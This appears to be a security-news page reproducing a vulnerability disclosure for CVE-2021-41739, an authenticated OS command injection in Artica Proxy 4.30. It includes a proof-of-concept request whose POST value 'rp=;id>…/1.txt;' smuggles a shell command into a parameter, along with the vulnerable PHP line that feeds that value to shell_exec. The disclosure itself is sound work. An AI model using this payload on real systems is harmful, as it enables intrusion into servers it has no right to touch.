Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-41739: Artica Proxy 4.30 cyrus.events.php RCE - rootless - Medium

A OS Command Injection vulnerability was discovered in Artica Proxy 4.30.000000. Attackers can execute OS commands in cyrus.events.php with GET param logs and POST param rp.

CVE
#vulnerability#web#php#rce

Vendor && Product

www.articatech.com

Artica Web Proxy v4.30.000000

Download: http://www.articatech.com/download.php

Reproduction

Login the web account, use this poc

Because the execution result is not echoed, we view the result by writing a file

https://192.168.108.14:9000/cyrus.events.php?logs=

POST:
rp=;id>…/1.txt;

access https://192.168.108.14:9000/1.txt, we can see the execution result.

OS Command Injection Analysis

The vulnerable file is in : cyrus.events.php, it receives a parameter logs and execute function logs()

In the function logs(), it receives another parameter rp with POST method, then take them to the file cyrus.php with ?cyrus-events=yes

In cyrus.php, cyrus-events corresponds to cyrus_events() which can execute os command through ;

$cmdline="$grep --binary-files=text -Ei \"$search\" /var/log/mail.log|$tail -n $rp >$logfile 2>&1";

shell_exec($cmdline);

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907